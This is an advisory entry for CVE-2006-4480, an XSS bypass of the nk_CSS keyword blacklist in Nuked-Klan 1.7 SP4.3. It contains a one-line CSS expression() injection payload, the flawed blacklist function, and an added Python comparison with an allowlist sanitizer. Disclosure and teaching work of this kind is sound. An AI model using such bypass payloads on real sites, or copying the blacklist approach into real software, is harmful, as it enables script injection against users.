Nuked-Klan 'nuked.php' nk_CSS function incomplete blacklist vulnerability

Vulnerability ID 1193647 Vulnerability type Unknown
Published 2006-08-31 Updated 2006-08-31
CVE CVE-2006-4480 CNNVD-ID CNNVD-200608-536
Platform N/A CVSS score 4.3
|Vulnerability sources
https://www.securityfocus.com/bid/83689
https://cxsecurity.com/issue/WLB-2006090006
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-536
|Vulnerability details
The nk_CSS function in nuked.php of Nuked-Klan 1.7 SP4.3 relies on an incomplete blacklist. A remote attacker can bypass the anti-cross-site-scripting protection and inject arbitrary web script or HTML by placing JavaScript in any attribute value that the blacklist does not cover.
|Exploit (PoC)
// *- BEGIN -*

// By Blwood
// http://blwood.net

We can bypass the anti-XSS function called nk_CSS (nuked.php) using
something like this:

<b id="blwood" style="width:expression(alert('http://www.blwood.net'))"></b>

Here is the function:

// nk_CSS() from nuked.php, Nuked-Klan 1.7 SP4.3. eregi_replace() is a
// case-insensitive POSIX regex replace (removed in PHP 7; preg_replace()
// with the /i modifier is the modern equivalent). Each blacklisted keyword
// is rewritten with one letter as an HTML numeric entity, so the browser
// still displays the word but it no longer appears literally in the markup.
// Those entities were decoded when this advisory was scraped (only a stray
// "&#101;" survived), so the encoded letters below are a reconstruction and
// may not sit at exactly the same positions as in the shipped file. Note
// that neither "style" nor "expression" is on the list, which is the gap
// the PoC above uses.
function nk_CSS($str)
{
    if ($str != "")
    {
        $str = eregi_replace("content-disposition:", "conten&#116;-dispositio&#110;:", $str);
        $str = eregi_replace("content-type:", "content&#45;type:", $str);
        $str = eregi_replace("content-transfer-encoding:", "conte&#110;t-transfer-&#101;ncoding:", $str);
        $str = eregi_replace("include", "in&#99;lude", $str);
        $str = eregi_replace("<?", "&#60;?", $str);
        $str = eregi_replace("<?php", "&#60;?php", $str);
        $str = eregi_replace("?>", "?&#62;", $str);
        $str = eregi_replace("script", "s&#99;ript", $str);
        $str = eregi_replace("eval", "e&#118;al", $str);
        $str = eregi_replace("javascript", "javascri&#112;t", $str);
        $str = eregi_replace("embed", "em&#98;ed", $str);
        $str = eregi_replace("iframe", "ifra&#109;e", $str);
        $str = eregi_replace("refresh", "r&#101;fresh", $str);
        $str = eregi_replace("onload", "onlo&#97;d", $str);
        $str = eregi_replace("onstart", "onst&#97;rt", $str);
        $str = eregi_replace("onerror", "oner&#114;or", $str);
        $str = eregi_replace("onabort", "onab&#111;rt", $str);
        $str = eregi_replace("onblur", "onbl&#117;r", $str);
        $str = eregi_replace("onchange", "onch&#97;nge", $str);
        $str = eregi_replace("onclick", "oncl&#105;ck", $str);
        $str = eregi_replace("ondblclick", "ondblcl&#105;ck", $str);
        $str = eregi_replace("onfocus", "onfoc&#117;s", $str);
        $str = eregi_replace("onkeydown", "onkeyd&#111;wn", $str);
        $str = eregi_replace("onkeypress", "onkeypr&#101;ss", $str);
        $str = eregi_replace("onkeyup", "onkey&#117;p", $str);
        $str = eregi_replace("onmousedown", "onmoused&#111;wn", $str);
        $str = eregi_replace("onmousemove", "onmousem&#111;ve", $str);
        $str = eregi_replace("onmouseover", "onmouseov&#101;r", $str);
        $str = eregi_replace("onmouseout", "onmouseo&#117;t", $str);
        $str = eregi_replace("onmouseup", "onmouse&#117;p", $str);
        $str = eregi_replace("onreset", "onres&#101;t", $str);
        $str = eregi_replace("onselect", "onsel&#101;ct", $str);
        $str = eregi_replace("onsubmit", "onsubm&#105;t", $str);
        $str = eregi_replace("onunload", "onunlo&#97;d", $str);
        $str = eregi_replace("document", "docum&#101;nt", $str);
        $str = eregi_replace("cookie", "cook&#105;e", $str);
        $str = eregi_replace("vbscript", "vbs&#99;ript", $str);
        $str = eregi_replace("location", "locat&#105;on", $str);
        $str = eregi_replace("object", "obj&#101;ct", $str);
        $str = eregi_replace("vbs", "v&#98;s", $str);
        $str = eregi_replace("href", "hr&#101;f", $str);
        $str = eregi_replace("src", "s&#114;c", $str);
    }
    return($str);
}

// *- END -*
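As an added example (not part of the advisory or of Nuked-Klan's code), the Python below models nk_CSS as a literal, case-insensitive keyword blacklist, shows that the advisory's style/expression payload passes through it untouched while an event-handler attribute is caught, and contrasts it with an allowlist sanitizer that keeps only a fixed set of attribute-free tags. The allowed tag set and the single-letter entity encoding are assumptions of the model.

```python
import html
import re

# Keyword blacklist exactly as listed in nk_CSS() of Nuked-Klan 1.7 SP4.3 (from the advisory).
NK_CSS_BLACKLIST = [
    "content-disposition:", "content-type:", "content-transfer-encoding:", "include",
    "<?", "<?php", "?>", "script", "eval", "javascript", "embed", "iframe", "refresh",
    "onload", "onstart", "onerror", "onabort", "onblur", "onchange", "onclick",
    "ondblclick", "onfocus", "onkeydown", "onkeypress", "onkeyup", "onmousedown",
    "onmousemove", "onmouseover", "onmouseout", "onmouseup", "onreset", "onselect",
    "onsubmit", "onunload", "document", "cookie", "vbscript", "location", "object",
    "vbs", "href", "src",
]


def nk_css_blacklist(s: str) -> str:
    """Model of nk_CSS: literal, case-insensitive replace (like eregi_replace) that
    turns the last letter of each keyword into an HTML numeric entity (assumed position)."""
    for word in NK_CSS_BLACKLIST:
        broken = word[:-1] + f"&#{ord(word[-1])};"
        s = re.sub(re.escape(word), broken, s, flags=re.IGNORECASE)
    return s


# Allowlist alternative: a fixed set of formatting tags, every attribute dropped,
# everything else HTML-escaped. The tag set is an assumption for this example.
ALLOWED_TAGS = {"b", "i", "u", "p", "br"}
TAG_RE = re.compile(r"<(/?)([a-zA-Z][a-zA-Z0-9]*)[^>]*>")


def allowlist_sanitize(s: str) -> str:
    out, pos = [], 0
    for m in TAG_RE.finditer(s):
        out.append(html.escape(s[pos:m.start()]))
        slash, name = m.group(1), m.group(2).lower()
        # Rebuilding the tag from its name alone drops style=, on*= and every other attribute.
        out.append(f"<{slash}{name}>" if name in ALLOWED_TAGS else html.escape(m.group(0)))
        pos = m.end()
    out.append(html.escape(s[pos:]))
    return "".join(out)


# The advisory's payload: no blacklisted keyword occurs in it, so nk_CSS leaves it intact.
PAYLOAD = '<b id="blwood" style="width:expression(alert(\'http://www.blwood.net\'))"></b>'

if __name__ == "__main__":
    print("blacklist:", nk_css_blacklist(PAYLOAD))            # unchanged: expression() survives
    print("blacklist:", nk_css_blacklist('<b onclick="x">'))  # caught: <b onclic&#107;="x">
    print("allowlist:", allowlist_sanitize(PAYLOAD))          # <b></b>
```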
|Affected products
Nuked-Klan Nuked-Klan 1.7 SP4.3
|References

Source: BUGTRAQ
Name: 20060830 Nuked Klan 1.7 SP4.3: Function Anti-XSS Bypassed
Link: http://www.securityfocus.com/archive/1/archive/1/444749/100/0/threaded
Source: SREASON
Name: 1478
Link: http://securityreason.com/securityalert/1478